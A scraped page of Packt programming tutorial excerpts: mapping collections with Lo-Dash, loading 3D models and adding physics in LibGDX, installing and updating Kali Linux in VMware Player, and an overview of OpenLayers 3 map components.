manipulating the original item in map() callbacks. If the item is an object and it's referenced elsewhere in your application, it could have unintended consequences. We're returning a new object as the mapped item in the preceding code. This is done using the pick() function. We only care about the first and the last properties. Our newly mapped collection looks identical to the original, except that no item has an age property. This newly mapped collection is seen in the following code: var collection = [ { first: 'Clinton', last: 'Park', age: 19 }, { first: 'Dana', last: 'Hines', age: 36 }, { first: 'Pete', last: 'Ross', age: 31 }, { first: 'Annie', last: 'Cross', age: 48 } ]; _.map(collection, function(item) { return _.omit(item, 'first'); }); // → // [ // { last: "Park", age: 19 }, // { last: "Hines", age: 36 }, // { last: "Ross", age: 31 }, // { last: "Cross", age: 48 } // ] The preceding code follows the same approach as the pick() code. The only difference is that we're excluding the first property from the newly created collection. You'll also notice that we're passing a string containing a single property name instead of an array of property names. In addition to passing strings or arrays as the argument to pick() or omit(), we can pass in a function callback. This is suitable when it's not very clear which objects in a collection should have which properties. Using a callback like this inside a map() callback lets us perform detailed comparisons and transformations on collections while using very little code: function invalidAge(value, key) { return key === 'age' && value < 40; } var collection = [ { first: 'Kim', last: 'Lawson', age: 40 }, { first: 'Marcia', last: 'Butler', age: 31 }, { first: 'Shawna', last: 'Hamilton', age: 39 }, { first: 'Leon', last: 'Johnston', age: 67 } ]; _.map(collection, function(item) { return _.omit(item, invalidAge); }); // → // [ // { first: "Kim", last: "Lawson", age: 40 }, // { first: "Marcia", last: "Butler" }, // { first: "Shawna", last: "Hamilton" }, // { first: "Leon", last: "Johnston", age: 67 } // ] The new collection generated by this code excludes the age property for items where the age value is less than 40. The callback supplied to omit() is applied to each key-value pair in the object. This code is a good illustration of the conciseness achievable with Lo-Dash. There's a lot of iterative code running here and there is no for or while statement in sight. Performing calculations It's time now to turn our attention to performing calculations in our map() callbacks. This entails looking at the item and, based on its current state, computing a new value that will be ultimately mapped to the new collection. This could mean extending the original item's properties or replacing one with a newly computed value. Whichever the case, it's a lot easier to map these computations than to write your own logic that applies these functions to every item in your collection. This is explained using the following example: var collection = [ { name: 'Valerie', jqueryYears: 4, cssYears: 3 }, { name: 'Alonzo', jqueryYears: 1, cssYears: 5 }, { name: 'Claire', jqueryYears: 3, cssYears: 1 }, { name: 'Duane', jqueryYears: 2, cssYears: 0 } ]; _.map(collection, function(item) { return _.extend({ experience: item.jqueryYears + item.cssYears, specialty: item.jqueryYears >= item.cssYears ? 'jQuery' : 'CSS' }, item); }); // → // [ // { // experience": 7, // specialty": "jQuery", // name": "Valerie", // jqueryYears": 4, // cssYears: 3 // }, // { // experience: 6, // specialty: "CSS", // name: "Alonzo", // jqueryYears: 1, // cssYears: 5 // }, // { // experience: 4, // specialty: "jQuery", // name: "Claire", // jqueryYears: 3, // cssYears: 1 // }, // { // experience: 2, // specialty: "jQuery", // name: "Duane", // jqueryYears: 2, // cssYears: 0 // } // ] Here, we're mapping each item in the original collection to an extended version of it. Particularly, we're computing two new values for each item—experience and speciality. The experience property is simply the sum of the jqueryYears and cssYears properties. The speciality property is computed based on the larger value of the jqueryYears and cssYears properties. Earlier, I mentioned the need to be careful when modifying items in map() callbacks. In general, it's a bad idea. It's helpful to try and remember that map() is used to generate new collections, not to modify existing collections. Here's an illustration of the horrific consequences of not being careful: var app = {}, collection = [ { name: 'Cameron', supervisor: false }, { name: 'Lindsey', supervisor: true }, { name: 'Kenneth', supervisor: false }, { name: 'Caroline', supervisor: true } ]; app.supervisor = _.find(collection, { supervisor: true }); _.map(collection, function(item) { return _.extend(item, { supervisor: false }); }); console.log(app.supervisor); // → { name: "Lindsey", supervisor: false } The destructive nature of this callback is not obvious at all and next to impossible for programmers to track down and diagnose. Its nature is essentially resetting the supervisor attribute for each item. If these items are used anywhere else in the application, the supervisor property value will be clobbered whenever this map job is executed. If you need to reset values like this, ensure that the change is mapped to the new value and not made to the original. Mapping also works with primitive values as the item. Often, we'll have an array of primitive values that we'd like transformed into an alternative representation. For example, let's say you have an array of sizes, expressed in bytes. You can map those arrays to a new collection with those sizes expressed as human-readable values, using the following code: function bytes(b) { var units = [ 'B', 'K', 'M', 'G', 'T', 'P' ], target = 0; while (b >= 1024) { b = b / 1024; target++; } return (b % 1 === 0 ? b : b.toFixed(1)) + units[target] + (target === 0 ? '' : 'B'); } var collection = [ 1024, 1048576, 345198, 120120120 ]; _.map(collection, bytes); // → [ "1KB", "1MB", "337.1KB", "114.6MB" ] The bytes() function takes a numerical argument, which is the number of bytes to be formatted. This is the starting unit. We just keep incrementing the target unit until we have something that is less than 1024. For example, the last item in our collection maps to '114.6MB'. The bytes() function can be passed directly to map() since it's expecting values in our collection as they are. Calling functions We don't always have to write our own callback functions for map(). Wherever it makes sense, we're free to leverage Lo-Dash functions to map our collection items. For example, let's say we have a collection and we'd like to know the size of each item. There's a size() Lo-Dash function we can use as our map() callback, as follows: var collection = [ [ 1, 2 ], [ 1, 2, 3 ], { first: 1, second: 2 }, { first: 1, second: 2, third: 3 } ]; _.map(collection, _.size); // → [ 2, 3, 2, 3 ] This code has the added benefit that the size() function returns consistent results, no matter what kind of argument is passed to it. In fact, any function that takes a single argument and returns a new value based on that argument is a valid candidate for a map() callback. For instance, we could also map the minimum and maximum value of each item: var source = _.range(1000), collection = [ _.sample(source, 50), _.sample(source, 100), _.sample(source, 150) ]; _.map(collection, _.min); // → [ 20, 21, 1 ] _.map(collection, _.max); // → [ 931, 985, 991 ] What if we want to map each item of our collection to a sorted version? Since we do not sort the collection itself, we don't care about the item positions within the collection, but the items themselves, if they're arrays, for instance. Let's see what happens with the following code: var collection = [ [ 'Evan', 'Veronica', 'Dana' ], [ 'Lila', 'Ronald', 'Dwayne' ], [ 'Ivan', 'Alfred', 'Doug' ], [ 'Penny', 'Lynne', 'Andy' ] ]; _.map(collection, _.compose(_.first, function(item) { return _.sortBy(item); })); // → [ "Dana", "Dwayne", "Alfred", "Andy" ] This code uses the compose() function to construct a map() callback. The first function returns the sorted version of the item by passing it to sortBy(). The first() item of this sorted list is then returned as the mapped item. The end result is a new collection containing the alphabetically first item from each array in our collection, with three lines of code. This is not bad. Filtering and mapping Filtering and mapping are two closely related collection operations. Filtering extracts only those collection items that are of particular interest in a given context. Mapping transforms collections to produce new collections. But what if you only want to map a certain subset of your collection? Then it would make sense to chain together the filtering and mapping operations, right? Here's an example of what that might look like: var collection = [ { name: 'Karl', enabled: true }, { name: 'Sophie', enabled: true }, { name: 'Jerald', enabled: false }, { name: 'Angie', enabled: false } ]; _.compose( _.partialRight(_.map, 'name'), _.partialRight(_.filter, 'enabled') )(collection); // → [ "Karl", "Sophie" ] This map is executed using compose() to build a function that is called right away, with our collection as the argument. The function is composed of two partials. We're using partialRight() on both arguments because we want the collection supplied as the leftmost argument in both cases. The first partial function is filter(). We're partially applying the enabled argument. So this function will filter our collection before it's passed to map(). This brings us to our next partial in the function composition. The result of filtering the collection is passed to map(), which has the name argument partially applied. The end result is a collection with enabled name strings. The important thing to note about the preceding code is that the filtering operation takes place before the map() function is run. We could have stored the filtered collection in an intermediate variable instead of streamlining with compose(). Regardless of flavor, it's important that the items in your mapped collection correspond to the items in the source collection. It's conceivable to filter out the items in the map() callback by not returning anything, but this is ill-advised as it doesn't map well, both figuratively and literally. Mapping objects The previous section focused on collections and how to map them. But wait, objects are collections too, right? That is indeed correct, but it's worth differentiating between the more traditional collections, arrays, and plain objects. The main reason is that there are implications with ordering and keys when performing map/reduce. At the end of the day, arrays and objects serve different use cases with map/reduce, and this article tries to acknowledge these differences. Now we'll start looking at some techniques Lo-Dash programmers employ when working with objects and mapping them to collections. There are a number of factors to consider such as the keys within an object and calling methods on objects. We'll take a look at the relationship between key-value pairs and how they can be used in a mapping context. Working with keys We can use the keys of a given object in interesting ways to map the object to a new collection. For example, we can use the keys() function to extract the keys of an object and map them to values other than the property value, as shown in the following example: var object = { first: 'Ronald', last: 'Walters', employer: 'Packt' }; _.map(_.sortBy(_.keys(object)), function(item) { return object[item]; }); // → [ "Packt", "Ronald", "Walters" ] The preceding code builds an array of property values from object. It does so using map(), which is actually mapping the keys() array of object. These keys are sorted using sortBy(). So Packt is the first element of the resulting array because employer is alphabetically first in the object keys. Sometimes, it's desirable to perform lookups in other objects and map those values to a target object. For example, not all APIs return everything you need for a given page, packaged in a neat little object. You have to do joins and build the data you need. This is shown in the following code: var users = {}, preferences = {}; _.each(_.range(100), function() { var id = _.uniqueId('user-'); users[id] = { type: 'user' }; preferences[id] = { emailme: !!(_.random()) }; }); _.map(users, function(value, key) { return _.extend({ id: key }, preferences[key]); }); // → // [ // { id: "user-1", emailme: true }, // { id: "user-2", emailme: false }, // ... // ] This example builds two objects, users and preferences. In the case of each object, the keys are user identifiers that we're generating with uniqueId(). The user objects just have some dummy attribute in them, while the preferences objects have an emailme attribute, set to a random Boolean value. Now let's say we need quick access to this preference for all users in the users object. As you can see, it's straightforward to implement using map() on the users object. The callback function returns a new object with the user ID. We extend this object with the preference for that particular user by looking at them by key. Calling methods Objects aren't limited to storing primitive strings and numbers. Properties can store functions as their values, or methods, as they're commonly referred. However, depending on the context where you're using your object, methods aren't always callable, especially if you have little or no control over the context where your objects are used. One technique that's helpful in situations such as these is mapping the result of calling these methods and using this result in the context in question. Let's see how this can be done with the following code: var object = { first: 'Roxanne', last: 'Elliot', name: function() { return this.first + ' ' + this.last; }, age: 38, retirement: 65, working: function() { return this.retirement - this.age; } }; _.map(object, function(value, key) { var item = {}; item[key] = _.isFunction(value) ? object[key]() : value return item; }); // → // [ // { first: "Roxanne" }, // { last: "Elliot" }, // { name: "Roxanne Elliot" }, // { age: 38 }, // { retirement: 65 }, // { working: 27 } // ] _.map(object, function(value, key) { var item = {}; item[key] = _.result(object, key); return item; }); // → // [ // { first: "Roxanne" }, // { last: "Elliot" }, // { name: "Roxanne Elliot" }, // { age: 38 }, // { retirement: 65 }, // { working: 27 } // ] Here, we have an object with both primitive property values and methods that use these properties. Now we'd like to map the results of calling those methods and we will experiment with two different approaches. The first approach uses the isFunction() function to determine whether the property value is callable or not. If it is, we call it and return that value. The second approach is a little easier to implement and achieves the same outcome. The result() function is applied to the object using the current key. This tests whether we're working with a function or not, so our code doesn't have to. In the first approach to mapping method invocations, you might have noticed that we're calling the method using object[key]() instead of value(). The former retains the context as the object variable, but the latter loses the context, since it is invoked as a plain function without any object. So when you're writing mapping callbacks that call methods and not getting the expected results, make sure the method's context is intact. Perhaps, you have an object but you're not sure which properties are methods. You can use functions() to figure this out and then map the results of calling each method to an array, as shown in the following code: var object = { firstName: 'Fredrick', lastName: 'Townsend', first: function() { return this.firstName; }, last: function() { return this.lastName; } }; var methods = _.map(_.functions(object), function(item) { return [ _.bindKey(object, item) ]; }); _.invoke(methods, 0); // → [ "Fredrick", "Townsend" ] The object variable has two methods, first() and last(). Assuming we didn't know about these methods, we can find them using functions(). Here, we're building a methods array using map(). The input is an array containing the names of all the methods of the given object. The value we're returning is interesting. It's a single-value array; you'll see why in a moment. The value of this array is a function built by passing the object and the name of the method to bindKey(). This function, when invoked, will always use object as its context. Lastly, we use invoke() to invoke each method in our methods array, building a new result array. Recall that our map() callback returned an array. This was a simple hack to make invoke() work, since it's a convenient way to call methods. It generally expects a key as the second argument, but a numerical index works just as well, since they're both looked up as same. Mapping key-value pairs Just because you're working with an object doesn't mean it's ideal, or even necessary. That's what map() is for—mapping what you're given to what you need. For instance, the property values are sometimes all that matter for what you're doing, and you can dispense with the keys entirely. For that, we have the values() function and we feed the values to map(): var object = { first: 'Lindsay', last: 'Castillo', age: 51 }; _.map(_.filter(_.values(object), _.isString), function(item) { return '<strong>' + item + '</strong>'; }); // → [ "<strong>Lindsay</strong>", "<strong>Castillo</strong>" ] All we want from the object variable here is a list of property values, which are strings, so that we can format them. In other words, the fact that the keys are first, last, and age is irrelevant. So first, we call values() to build an array of values. Next, we pass that array to filter(), removing anything that's not a string. We then pass the output of this to map, where we're able to map the string using <strong/> tags. The opposite might also be true—the value is completely meaningless without its key. If that's the case, it may be fitting to map key-value pairs to a new collection, as shown in the following example: function capitalize(s) { return s.charAt(0).toUpperCase() + s.slice(1); } function format(label, value) { return '<label>' + capitalize(label) + ':</label>' + '<strong>' + value + '</strong>'; } var object = { first: 'Julian', last: 'Ramos', age: 43 }; _.map(_.pairs(object), function(pair) { return format.apply(undefined, pair); }); // → // [ // "<label>First:</label><strong>Julian</strong>", // "<label>Last:</label><strong>Ramos</strong>", // "<label>Age:</label><strong>43</strong>" // ] We're passing the result of running our object through the pairs() function to map(). The argument passed to our map callback function is an array, the first element being the key and the second being the value. It so happens that the format() function expects a key and a value to format the given string, so we're able to use format.apply() to call the function, passing it the pair array. This approach is just a matter of taste. There's no need to call pairs() before map(). We could just as easily have called format directly. But sometimes, this approach is preferred, and the reasons, not least of which is the style of the programmer, are wide and varied. Summary This article introduced you to the map/reduce programming model and how Lo-Dash tools help realize it in your application. First, we examined mapping collections, including how to choose which properties get included and how to perform calculations. We then moved on to mapping objects. Keys can have an important role in how objects get mapped to new objects and collections. There are also methods and functions to consider when mapping. Resources for Article: Further resources on this subject: The First Step [article] Recursive directives [article] AngularJS Project [article]

0
0
6209

How-To Tutorials

Packt

05 Feb 2015

7 min read

3D Modeling

Packt

05 Feb 2015

7 min read

In this article by Suryakumar Balakrishnan Nair and Andreas Oehlke, authors of Learning LibGDX Game Development, Second Edition, you will learn how to load a model and create a basic 3D scene. In a game, we need an actual model exported from Blender or any other 3D animation software. (For more resources related to this topic, see here.) Loading a model Copy these three files to the assets folder of the android project: car.g3dj: This is the model file to be used in our example tiretext.jpg and yellowtaxi.jpg: These are the materials for the model Replacing the ModelBuilder class in our ModelTest.java file, we add the following code: assets = new AssetManager(); assets.load("car.g3dj", Model.class); assets.finishLoading(); model = assets.get("car.g3dj", Model.class); instance = new ModelInstance(model); Additionally, a camera input controller is also added to inspect the model from various angles as follows: camController = new CameraInputController(cam); Gdx.input.setInputProcessor(camController); camController.update(); This camera input controller will be updated on each render() by calling camController.update(). The completed MyModelTest.java is as follows: public class MyModelTest extends ApplicationAdapter { public Environment environment; public PerspectiveCamera cam; public CameraInputController camController; public ModelBatch modelBatch; public Model model; public ModelInstance instance; public AssetManager assets ; @Override public void create() { environment = new Environment(); environment.set(new ColorAttribute(ColorAttribute.AmbientLight, 0.4f, 0.4f, 0.4f, 1f)); environment.add(new DirectionalLight().set(0.8f, 0.8f, 0.8f, -1f, -0.8f, -0.2f)); modelBatch = new ModelBatch(); cam = new PerspectiveCamera(67, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); cam.position.set(1,1,1); cam.lookAt(0, 0, 0); cam.near = 1f; cam.far = 300f; cam.update(); assets = new AssetManager(); assets.load("car.g3dj", Model.class); assets.finishLoading(); model = assets.get("car.g3dj", Model.class); instance = new ModelInstance(model); camController = new CameraInputController(cam); Gdx.input.setInputProcessor(camController); } @Override public void render() { camController.update(); Gdx.gl.glViewport(0, 0, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); Gdx.gl.glClear(GL20.GL_COLOR_BUFFER_BIT | GL20.GL_DEPTH_BUFFER_BIT); modelBatch.begin(cam); modelBatch.render(instance, environment); modelBatch.end(); } @Override public void dispose() { modelBatch.dispose(); assets.dispose() ; } } The new additions are highlighted. The following is a screenshot of the render scene. Use the W , S , A , D keys and mouse to navigate through the scene. Model formats and the FBX converter LibGDX supports three model formats, namely Wavefront OBJ, G3DJ, and G3DB. Wavefront OBJ models are intended for testing purposes only because this format does not include enough information for complex models. You can export your 3D model as .obj from any 3D animation or modeling software, however LibGDX does not fully support .obj, hence, if you use your own .obj model, then it might not render correctly. The G3DJ is a JSON textual format supported by LibGDX and can be used for debugging, whereas the G3DB is a binary format and is faster to load. One of the most popular model formats supported by any modeling software is FBX. LibGDX provides a tool called FBX converter to convert formats such as .obj and .fbx into the LibGDX supported formats .g3dj and .g3db. To convert car.fbx to a .g3db format, open the command line and call fbx-conv-win32, as shown in the following screenshot: Make sure that the fbx-conv-win32.exe file is in the same folder as car.fbx. Otherwise, you will have to use the full path of the source file to convert. To find out more about FBX converter visit https://github.com/libgdx/fbx-conv and https://github.com/libgdx/libgdx/wiki/3D-animations-and-skinning. Also, you can download FBX converter from http://libgdx.badlogicgames.com/fbx-conv. Creating a basic 3D scene Create a simple scene with a ball and ground, as shown in the following screenshot: Add the following code to MyCollisionTest.java: package com.packtpub.libgdx.collisiontest; import com.badlogic.gdx.ApplicationAdapter; import com.badlogic.gdx.Gdx; ... import com.badlogic.gdx.utils.Array; public class MyCollisionTest extends ApplicationAdapter { PerspectiveCamera cam; ModelBatch modelBatch; Array<Model> models; ModelInstance groundInstance; ModelInstance sphereInstance; Environment environment; ModelBuilder modelbuilder; @Override public void create() { modelBatch = new ModelBatch(); environment = new Environment(); environment.set(new ColorAttribute(ColorAttribute.AmbientLight, 0.4f, 0.4f, 0.4f, 1f)); environment.add(new DirectionalLight().set(0.8f, 0.8f, 0.8f, -1f, -0.8f, -0.2f)); cam = new PerspectiveCamera(67, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); cam.position.set(0, 10, -20); cam.lookAt(0, 0, 0); cam.update(); models = new Array<Model>(); modelbuilder = new ModelBuilder(); // creating a ground model using box shape float groundWidth = 40; modelbuilder.begin(); MeshPartBuilder mpb = modelbuilder.part("parts", GL20.GL_TRIANGLES, Usage.Position | Usage.Normal | Usage.Color, new Material(ColorAttribute.createDiffuse(Color.WHITE))); mpb.setColor(1f, 1f, 1f, 1f); mpb.box(0, 0, 0, groundWidth, 1, groundWidth); Model model = modelbuilder.end(); models.add(model); groundInstance = new ModelInstance(model); // creating a sphere model float radius = 2f; final Model sphereModel = modelbuilder.createSphere(radius, radius, radius, 20, 20, new Material(ColorAttribute.createDiffuse(Color.RED), ColorAttribute.createSpecular(Color.GRAY), FloatAttribute.createShininess(64f)), Usage.Position | Usage.Normal); models.add(sphereModel); sphereInstance = new ModelInstance(sphereModel); sphereinstance.transform.trn(0, 10, 0); } public void render() { Gdx.gl.glViewport(0, 0, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); Gdx.gl.glClearColor(0, 0, 0, 1); Gdx.gl.glClear(GL20.GL_COLOR_BUFFER_BIT | GL20.GL_DEPTH_BUFFER_BIT); modelBatch.begin(cam); modelBatch.render(groundInstance, environment); modelBatch.render(sphereInstance, environment); modelBatch.end(); } @Override public void dispose() { modelBatch.dispose(); for (Model model : models) model.dispose(); } } The ground is actually a thin box created using ModelBuilder just like the sphere. Now that we have created a simple 3D scene, let's add some physics using the following code: public class MyCollisionTest extends ApplicationAdapter { ... private btDefaultCollisionConfiguration collisionConfiguration; private btCollisionDispatcher dispatcher; private btDbvtBroadphase broadphase; private btSequentialImpulseConstraintSolver solver; private btDiscreteDynamicsWorld world; private Array<btCollisionShape> shapes = new Array<btCollisionShape>(); private Array<btRigidBodyConstructionInfo> bodyInfos = new Array<btRigidBody.btRigidBodyConstructionInfo>(); private Array<btRigidBody> bodies = new Array<btRigidBody>(); private btDefaultMotionState sphereMotionState; @Override public void create() { ... // Initiating Bullet Physics Bullet.init(); //setting up the world collisionConfiguration = new btDefaultCollisionConfiguration(); dispatcher = new btCollisionDispatcher(collisionConfiguration); broadphase = new btDbvtBroadphase(); solver = new btSequentialImpulseConstraintSolver(); world = new btDiscreteDynamicsWorld(dispatcher, broadphase, solver, collisionConfiguration); world.setGravity(new Vector3(0, -9.81f, 1f)); // creating ground body btCollisionShape groundshape = new btBoxShape(new Vector3(20, 1 / 2f, 20)); shapes.add(groundshape); btRigidBodyConstructionInfo bodyInfo = new btRigidBodyConstructionInfo(0, null, groundshape, Vector3.Zero); this.bodyInfos.add(bodyInfo); btRigidBody body = new btRigidBody(bodyInfo); bodies.add(body); world.addRigidBody(body); // creating sphere body sphereMotionState = new btDefaultMotionState(sphereInstance.transform); sphereMotionState.setWorldTransform(sphereInstance.transform); final btCollisionShape sphereShape = new btSphereShape(1f); shapes.add(sphereShape); bodyInfo = new btRigidBodyConstructionInfo(1, sphereMotionState, sphereShape, new Vector3(1, 1, 1)); this.bodyInfos.add(bodyInfo); body = new btRigidBody(bodyInfo); bodies.add(body); world.addRigidBody(body); } public void render() { Gdx.gl.glViewport(0, 0, Gdx.graphics.getWidth(), Gdx.graphics.getHeight()); Gdx.gl.glClearColor(0, 0, 0, 1); Gdx.gl.glClear(GL20.GL_COLOR_BUFFER_BIT | GL20.GL_DEPTH_BUFFER_BIT); world.stepSimulation(Gdx.graphics.getDeltaTime(), 5); sphereMotionState.getWorldTransform(sphereInstance.transform); modelBatch.begin(cam); modelBatch.render(groundInstance, environment); modelBatch.render(sphereInstance, environment); modelBatch.end(); } @Override public void dispose() { modelBatch.dispose(); for (Model model : models) model.dispose(); for (btRigidBody body : bodies) { body.dispose(); } sphereMotionState.dispose(); for (btCollisionShape shape : shapes) shape.dispose(); for (btRigidBodyConstructionInfo info : bodyInfos) info.dispose(); world.dispose(); collisionConfiguration.dispose(); dispatcher.dispose(); broadphase.dispose(); solver.dispose(); Gdx.app.log(this.getClass().getName(), "Disposed"); } } The highlighted parts are the addition to our previous code. After execution, we see the ball falling and colliding with the ground. Summary In this article, you learned how to load a 3D model of a car and created a basic 3D scene. Resources for Article: Further resources on this subject: Getting Started with GameSalad [article] Sparrow iOS Game Framework - The Basics of Our Game [article] Making Money with Your Game [article]

0
0
14295

Packt

05 Feb 2015

1 min read

What is Kali Linux

Packt

05 Feb 2015

1 min read

This article created by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It covers many different varieties of security tools, each of which are organized by category. Let's begin by downloading and installing Kali Linux! (For more resources related to this topic, see here.) Downloading Kali Linux Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited so let's begin! Visit http://www.kali.org/downloads/. Look under the Official Kali Linux Downloads section: In this demonstration, I will be downloading and installing Kali Linux 1.0.6 32 Bit ISO. Click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it. Depending on your Internet connection, this may take an hour to download, so please prepare yourself ahead of time so that you do not have to wait on this download. Those who have a slow Internet connection may want to reconsider downloading from a faster source within the local area. Restrictions on downloading may apply in public locations. Please make sure you have permission to download Kali Linux before doing so. Installing Kali Linux in VMware Player Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that emulates an operating system without requiring another physical system. You can create multiple operating systems and run them simultaneously. Perform the following steps: Let's start off by opening VMware Player from your desktop: VMware Player should open and display a graphical user interface: Click on Create a New Virtual Machine on the right: Select I will install the operating system later and click on Next. Select Linux and then Debian 7 from the drop-down menu: Click on Next to continue. Type Kali Linux for the virtual machine name. Browse for the Kali Linux ISO file that was downloaded earlier then click on Next. Change the disk size from 25 GB to 50 GB and then click on Next: Click on Finish: Kali Linux should now be displaying in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware. Click on Play virtual machine: Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings…: Check the box next to Connected, Select Use ISO image file, browse for the Kali Linux ISO, then click on OK. Click on Restart VM at the bottom of the screen or click on Player, then navigate to Power | Restart Guest; the following screen appears: After restarting the virtual machine, you should see the following: Select Live (686-pae) then press Enter It should boot into Kali Linux and take you to the desktop screen: Congratulations! You have successfully installed Kali Linux. Updating Kali Linux Before we can get started with any of the demonstrations in this book, we must update Kali Linux to help keep the software package up to date. Open VMware Player from your desktop. Select Kali Linux and click on the green arrow to boot it. Once Kali Linux has booted up, open a new Terminal window. Type sudo apt-get update and press Enter: Then type sudo apt-get upgrade and press Enter: You will be prompted to specify if you want to continue. Type y and press Enter: Repeat these commands until there are no more updates: sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade Congratulations! You have successfully updated Kali Linux! Summary This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work through Kali Linux to install and update it on VMware Player. Resources for Article: Further resources on this subject: Veil-Evasion [article] Penetration Testing and Setup [article] Wireless and Mobile Hacks [article]

0
0
8711

How-To Tutorials

Packt

04 Feb 2015

28 min read

Working with Incanter Datasets

Packt

04 Feb 2015

28 min read

0
0
3693

Packt

04 Feb 2015

13 min read

OpenLayers' Key Components

Packt

04 Feb 2015

13 min read

In this article by, Thomas Gratier, Paul Spencer, and Erik Hazzard, authors of the book OpenLayers 3 Beginner's Guide, we will see the various components of OpenLayers and a short description about them. (For more resources related to this topic, see here.) The OpenLayers library provides web developers with components useful for building web mapping applications. Following the principles of object-oriented design, these components are called classes. The relationship between all the classes in the OpenLayers library is part of the deliberate design, or architecture, of the library. There are two types of relationships that we, as developers using the library, need to know about: relationships between classes and inheritance between classes. Relationships between classes describe how classes, or more specifically, instances of classes, are related to each other. There are several different conceptual ways that classes can be related, but basically a relationship between two classes implies that one of the class uses the other in some way, and often vice-versa. Inheritance between classes shows how behavior of classes, and their relationships are shared with other classes. Inheritance is really just a way of sharing common behavior between several different classes. We'll start our discussion of the key components of OpenLayers by focusing on the first of these – the relationship between classes. We'll start by looking at the Map class – ol.Map. Its all about the map Instances of the Map class are at the center of every OpenLayers application. These objects are instances of the ol.Map class and they use instances of other classes to do their job, which is to put an interactive map onto a web page. Almost every other class in the OpenLayers is related to the Map class in some direct or indirect relationship. The following diagram illustrates the direct relationships that we are most interested in: The preceding diagram shows the most important relationships between the Map class and other classes it uses to do its job. It tells us several important things: A map has 0 or 1 view instances and it uses the name view to refer to it. A view may be associated with multiple maps, however. A map may have 0 or more instances of layers managed by a Collection class and a layer may be associated with 0 or one Map class. The Map class has a member variable named layers that it uses to refer to this collection. A map may have 0 or more instances of overlays managed by a Collection class and an overlay may be associated with 0 or one Map class. The Map class has a member variable named overlays that it uses to refer to this collection. A map may have 0 or more instances of controls managed by a class called ol.Collection and controls may be associated with 0 or one Map class. The Map class has a member variable named controls that it uses to refer to this collection. A map may have 0 or more instances of interactions managed by a Collection class and an interaction may be associated with 0 or one Map class. The Map class has a member variable named interactions that it uses to refer to this collection. Although these are not the only relationships between the Map class and other classes, these are the ones we'll be working with the most. The View class (ol.View) manages information about the current position of the Map class. If you are familiar with the programming concept of MVC (Model-View-Controller), be aware that the view class is not a View in the MVC sense. It does not provide the presentation layer for the map, rather it acts more like a controller (although there is not an exact parallel because OpenLayers was not designed with MVC in mind). The Layer class (ol.layer.Base) is the base class for classes that provide data to the map to be rendered. The Overlay class (ol.Overlay) is an interactive visual element like a control, but it is tied to a specific geographic position. The Control class (ol.control.Control) is the base class for a group of classes that collectively provide the ability to a user to interact with the Map. Controls have a visible user interface element (such as a button or a form input element) with which the user interacts. The Interaction class (ol.interaction.Interaction) is the base class for a group of classes that also allow the user to interact with the map, but differ from controls in which they have no visible user interface element. For example, the DragPan interaction allows the user to click on and drag the map to pan around. Controlling the Map's view The OpenLayers view class, ol.View, represents a simple two-dimensional view of the world. It is responsible for determining where, and to some degree how, the user is looking at the world. It is responsible for managing the following information: The geographic center of the map The resolution of the map, which is to say how much of the map we can see around the center The rotation of the map Although you can create a map without a view, it won't display anything until a view is assigned to it. Every map must have a view in order to display any map data at all. However, a view may be shared between multiple instances of the Map class. This effectively synchronizes the center, resolution, and rotation of each of the maps. In this way, you can create two or more maps in different HTML containers on a web page, even showing different information, and have them look at the same world position. Changing the position of any of the maps (for instance, by dragging one) automatically updates the other maps at the same time! Displaying map content So, if the view is responsible for managing where the user is looking in the world, which component is responsible for determining what the user sees there? That's the job of layers and overlays. A layer provides access to a source of geospatial data. There are two basic kinds of layers, that is, raster and vector layers: In computer graphics, the term raster (raster graphics) refers to a digital image. In OpenLayers, a raster layer is one that displays images in your map at specific geographic locations. In computer graphics, the term vector (vector graphics) refers to images that are defined in terms of geometric shapes, such as points, lines, and polygons—or mathematic formulae such as Bézier curves. In OpenLayers, a vector layer reads geospatial data from vector data (such as a KML file) and the data can then be drawn onto the map. Layers are not the only way to display spatial information on the map. The other way is to use an overlay. We can create instances of ol.Overlay and add them to the map at specific locations. The overlay then positions its content (an HTML element) on the map at the specified location. The HTML element can then be used like any other HTML element. The most common use of overlays is to display spatially relevant information in a pop-up dialog in response to the mouse moving over, or clicking on a geographic feature. Interacting with the map As mentioned earlier, the two components that allow users to interact with the map are Interactions and Controls. Let's look at them in a bit more detail. Using interactions Interactions are components that allow the user to interact with the map via some direct input, usually by using the mouse (or a finger with a touch screen). Interactions have no visible user interface. The default set of interactions are: ol.interaction.DoubleClickZoom: If you double-click the left mouse button, the map will zoom in by a factor of 2 ol.interaction.DragPan: If you drag the map, it will pan as you move the mouse ol.interaction.PinchRotate: On touch-enabled devices, placing two fingers on the device and rotating them in a circular motion will rotate the map ol.interaction.PinchZoom: On touch-enabled devices, placing two fingers on the device and pinching them together or spreading them apart will zoom the map out and in respectively ol.interaction.KeyboardPan: You can use the arrow keys to pan the map in the direction of the arrows ol.interaction.KeyboardZoom: You can use the + and – keys to zoom in and out ol.interaction.MouseWheelZoom: You can use the scroll wheel on a mouse to zoom the map in and out ol.interaction.DragZoom: If you hold the Shift key while dragging on map, a rectangular region will be drawn and when you release the mouse button, you will zoom into that area Controls Controls are components that allow the user to modify the map state via some visible user interface element, such as a button. In the examples we've seen so far, we've seen zoom buttons in the top-left corner of the map and an attribution control in the bottom-right corner of the map. In fact, the default controls are: ol.control.Zoom: This displays the zoom buttons in the top-left corner. ol.control.Rotate: This is a button to reset rotation to 0; by default, this is only displayed when the map's rotation is not 0. Ol.control.Attribution: This displays attribution text for the layers currently visible in the map. By default, the attributions are collapsed to a single icon in the bottom-right corner and clicking the icon will show the attributions. This concludes our brief overview of the central components of an OpenLayers application. We saw that the Map class is at the center of everything and there are some key components—the view, layers, overlays, interactions, and controls—that it uses to 